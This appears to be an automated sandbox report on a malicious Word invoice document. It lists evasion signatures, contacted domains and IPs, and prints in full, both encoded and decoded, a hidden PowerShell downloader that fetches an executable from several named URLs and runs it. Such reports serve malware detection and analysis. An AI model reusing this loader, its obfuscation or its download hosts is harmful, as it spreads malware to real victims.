Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: tomation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb56a source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdbIL source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdb1. source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: emti.pdb source: powershell.exe, 00000005.00000002.941139445.000000001B3A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbll source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8ystem.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -w hidden -en JABOAHAAegBmAHIAbgB6AGIAcgB0AGkAdQBtAD0AJwBWAGYAZgB1AHcAeQBoAHkAaQBnAGkAeQBxACcAOwAkAEUAcwB4AHQAeQBkAGoAcABrACAAPQAgACcAOAA3ADMAJwA7ACQAWQBsAG4AagBxAHMAcwBjAG0AcABtAD0AJwBXAHkAbABxAGEAaQBkAGsAcQBhACcAOwAkAEkAbQB4AGYAcgB4AHQAYQBwAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcwB4AHQAeQBkAGoAcABrACsAJwAuAGUAeABlACcAOwAkAFIAcgB5AGkAcABqAGYAaABkAD0AJwBZAHQAaQBkAG4AYwBpAGcAbABlACcAOwAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAEcAcABjAGsAeQBzAGMAeQBhAGUAbgBkAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAHMAdABhAGYAZgByAGUAYwBvAHIAZABzAC4AYwBvAG0ALwBpAG4AZABpAHYAaQBkAHUAYQBsAEEAcABpAC8AMAAvACoAaAB0AHQAcAA6AC8ALwBmAG8AbwB6AG8AbwBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUQB4AGkANwBpAFYARAAvACoAaAB0AHQAcAA6AC8ALwA3AGEAcgBhAHMAcABvAHIAdAAuAGMAbwBtAC8AdgBhAGwAaQBkAGEAdABlAGYAaQBlAGwAZAAvAGcAagAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAyAC4AZQBrAHQAbwBuAGUAbgBkAG8AbgAuAGcAcgAvAGMAZwBpAC0AYgBpAG4ALwBtAFQAVABDAEYAbQBWAGUALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGkAYQBnAG4AbwBzAHQAaQBjAGEALQBwAHIAbwBkAHUAYwB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAaQBvADIAdQA3AHcALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAJwAqACcAKQA7ACQASQB4AGkAcQBvAGcAZgBpAGsAbQA9ACcAQgB0AHQAeABnAGgAdgBpAG4AbwBtAHcAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBiAGMAbgB6AGcAcwBwAGEAdAAgAGkAbgAgACQARwBwAGMAawB5AHMAYwB5AGEAZQBuAGQAegApAHsAdAByAHkAewAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0ALgAiAEQATwBXAGAATgBMAE8AYABBAEQAYABGAEkAbABFACIAKAAkAE0AYgBjAG4AegBnAHMAcABhAHQALAAgACQASQBtAHgAZgByAHgAdABhAHAAbwApADsAJABIAGgAdABvAGIAZgBmAHAAbABnAHMAPQAnAFgAYQB5AG0AcABpAGMAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAbQB4AGYAcgB4AHQAYQBwAG8AKQAuACIAbABgAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAxADYAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAdAAiACgAJABJAG0AeABmAHIAeAB0AGEAcABvACkAOwAkAEUAaQBkAHkAdABrAGwAeQA9ACcAWQBiAHEAeABjAHUAdgBkAGkAcQBuACcAOwBiAHIAZQBhAGsAOwAkAEwAbQBxAGEAaABqAGMAdwB5AHcAdABrAD0AJwBHAHcAYQB1AHUAaABsAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBuAG8AZwBxAGIAdQBtAG8APQAnAEwAZABrAGUAbwBnAHMAYQBmAHgAbgBqACcA

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 264 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $Npzfrnzbrtium='Vffuwyhyigiyq';$Esxtydjpk = '873';$Ylnjqsscmpm='Wylqaidkqa';$Imxfrxtapo=$env:userprofile+'\'+$Esxtydjpk+'.exe';$Rryipjfhd='Ytidncigle';$Uwudrmogjlosm=&('new-'+'objec'+'t') neT.WEBcLIeNT;$Gpckyscyaendz='http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/'."s`PLit"('*');$Ixiqogfikm='Bttxghvinomws';foreach($Mbcnzgspat in $Gpckyscyaendz){try{$Uwudrmogjlosm."DOW`NLO`AD`FIlE"($Mbcnzgspat, $Imxfrxtapo);$Hhtobffplgs='Xaympicu';If ((.('G'+'et-'+'Item') $Imxfrxtapo)."l`EnG`TH" -ge 27169) {[Diagnostics.Process]::"sT`ARt"($Imxfrxtapo);$Eidytkly='Ybqxcuvdiqn';break;$Lmqahjcwywtk='Gwauuhlz'}}catch{}}$Onogqbumo='Ldkeogsafxnj'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -en jaboahaaegbmahiabgb6agiacgb0agkadqbtad0ajwbwagyazgb1ahcaeqboahkaaqbnagkaeqbxaccaowakaeuacwb4ahqaeqbkagoacabracaapqagaccaoaa3admajwa7acqawqbsag4aagbxahmacwbjag0acabtad0ajwbxahkababxageaaqbkagsacqbhaccaowakaekabqb4agyacgb4ahqayqbwag8apqakaguabgb2adoadqbzaguacgbwahiabwbmagkabablacsajwbcaccakwakaeuacwb4ahqaeqbkagoacabracsajwauaguaeablaccaowakafiacgb5agkacabqagyaaabkad0ajwbzahqaaqbkag4aywbpagcabablaccaowakafuadwb1agqacgbtag8azwbqagwabwbzag0apqamacgajwbuaguadwataccakwanag8aygbqaguaywanacsajwb0accakqagag4azqbuac4avwbfaeiaywbmaekazqboafqaowakaecacabjagsaeqbzagmaeqbhaguabgbkahoapqanaggadab0ahaaogavac8ayqbtahmadabhagyazgbyaguaywbvahiazabzac4aywbvag0alwbpag4azabpahyaaqbkahuayqbsaeeacabpac8amaavacoaaab0ahqacaa6ac8alwbmag8abwb6ag8abwbwac4aywbvag0alwb3ahaalqbjag8abgb0aguabgb0ac8auqb4agkanwbpafyaraavacoaaab0ahqacaa6ac8alwa3ageacgbhahmacabvahiadaauagmabwbtac8adgbhagwaaqbkageadablagyaaqblagwazaavagcaagavacoaaab0ahqacaa6ac8alwbkaguadgayac4azqbrahqabwbuaguabgbkag8abgauagcacgavagmazwbpac0aygbpag4alwbtafqavabdaeyabqbwagualwaqaggadab0ahaacwa6ac8alwbkagkayqbnag4abwbzahqaaqbjagealqbwahiabwbkahuaywb0ahmalgbjag8abqavahcacaatageazabtagkabgavaggaaqbvadiadqa3ahcalwanac4aigbzagaauabmagkadaaiacgajwaqaccakqa7acqasqb4agkacqbvagcazgbpagsabqa9accaqgb0ahqaeabnaggadgbpag4abwbtahcacwanadsazgbvahiazqbhagmaaaaoacqatqbiagmabgb6agcacwbwageadaagagkabgagacqarwbwagmaawb5ahmaywb5ageazqbuagqaegapahsadabyahkaewakafuadwb1agqacgbtag8azwbqagwabwbzag0algaiaeqatwbxagaatgbmae8ayabbaeqayabgaekababfaciakaakae0aygbjag4aegbnahmacabhahqalaagacqasqbtahgazgbyahgadabhahaabwapadsajabiaggadabvagiazgbmahaababnahmapqanafgayqb5ag0acabpagmadqanadsasqbmacaakaaoac4akaanaecajwaraccazqb0ac0ajwaraccasqb0aguabqanackaiaakaekabqb4agyacgb4ahqayqbwag8akqauaciababgaeuabgbhagaavabiaciaiaatagcazqagadianwaxadyaoqapacaaewbbaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoaigbzafqayabbafiadaaiacgajabjag0aeabmahiaeab0ageacabvackaowakaeuaaqbkahkadabragwaeqa9accawqbiaheaeabjahuadgbkagkacqbuaccaowbiahiazqbhagsaowakaewabqbxageaaabqagmadwb5ahcadabrad0ajwbhahcayqb1ahuaaabsahoajwb9ah0aywbhahqaywboahsafqb9acqatwbuag8azwbxagiadqbtag8apqanaewazabraguabwbnahmayqbmahgabgbqacca
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 800690 Sample: INV_PO_12172019EX.doc Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 19 Multi AV Scanner detection for domain / URL 2->19 21 Antivirus detection for URL or domain 2->21 23 Antivirus / Scanner detection for submitted sample 2->23 25 8 other signatures 2->25 5 WINWORD.EXE 446 42 2->5         started        8 powershell.exe 12 7 2->8         started        process3 dnsIp4 11 C:\Users\user\...\~DF413F6883B338D566.TMP, Composite 5->11 dropped 13 7arasport.com 103.224.212.222, 49173, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 8->13 15 dev2.ektonendon.gr 162.212.129.161, 49175, 80 A2HOSTINGUS United States 8->15 17 6 other IPs or domains 8->17 file5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
13.248.148.254
 701602.parkingcrew.net United States
16509 AMAZON-02US false
103.224.212.222
 7arasport.com Australia
133618 TRELLIAN-AS-APTrellianPtyLimitedAU true
162.212.129.161
 dev2.ektonendon.gr United States
55293 A2HOSTINGUS true

Private

IP
192.168.2.255

Contacted Domains

Name IP Active
701602.parkingcrew.net 13.248.148.254 true
7arasport.com 103.224.212.222 true
dev2.ektonendon.gr 162.212.129.161 true
amstaffrecords.com unknown unknown
ww38.7arasport.com unknown unknown
diagnostica-products.com unknown unknown
foozoop.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://7arasport.com/validatefield/gj/ true
  • Avira URL Cloud: safe
 unknown
http://ww38.7arasport.com/validatefield/gj/ false
  • Avira URL Cloud: safe
 unknown
http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/ true
  • Avira URL Cloud: malware
 unknown